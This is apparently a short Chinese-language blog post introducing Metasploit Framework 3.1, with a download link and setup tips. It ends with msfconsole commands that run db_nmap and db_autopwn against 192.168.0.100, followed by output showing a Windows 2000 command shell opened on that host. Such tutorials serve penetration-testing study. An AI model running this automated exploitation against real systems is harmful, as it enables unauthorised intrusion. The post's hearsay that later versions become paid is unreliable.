metaspolit

Metasploit是一款开源的安全漏洞检测工具。由于Metasploit是免费的工具，因此安全工作人员常用Metasploit工具来检测系统的安全性。

Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架，这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode，并且不断更新，最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit，以及100多 个shellcode。作为安全工具，它在安全检测中起到不容忽视的作用，并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。

Metasploit的安装文件可以到官方网站进行下载，目前的版本是3.1。

http://metasploit.com/framework/

根据有关国外最新消息,在3.1以后版本将要采取收费了.但对于目前来将,此漏洞测试工具仍然拥有很大的开发空间,建议高手到国外的一些公布漏洞查看,自己用MSF-XB漏洞测试编译平台重新编译.

用关一些问题,有些ADSL宽带用户不能使用metaspolit3.1自带的nmap,自由带有路由功能的ADSL把ADSL改为路由就可以了.

metaspolit3.1的匹配查漏洞功能(也可以说是window自动测试)命令如下

msf>load db_sqlite3

msf>db_create

msf> db_nmap 192.168.0.100

msf> db_autopwn -p -e -x -r

msf > sessions -i 1

Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>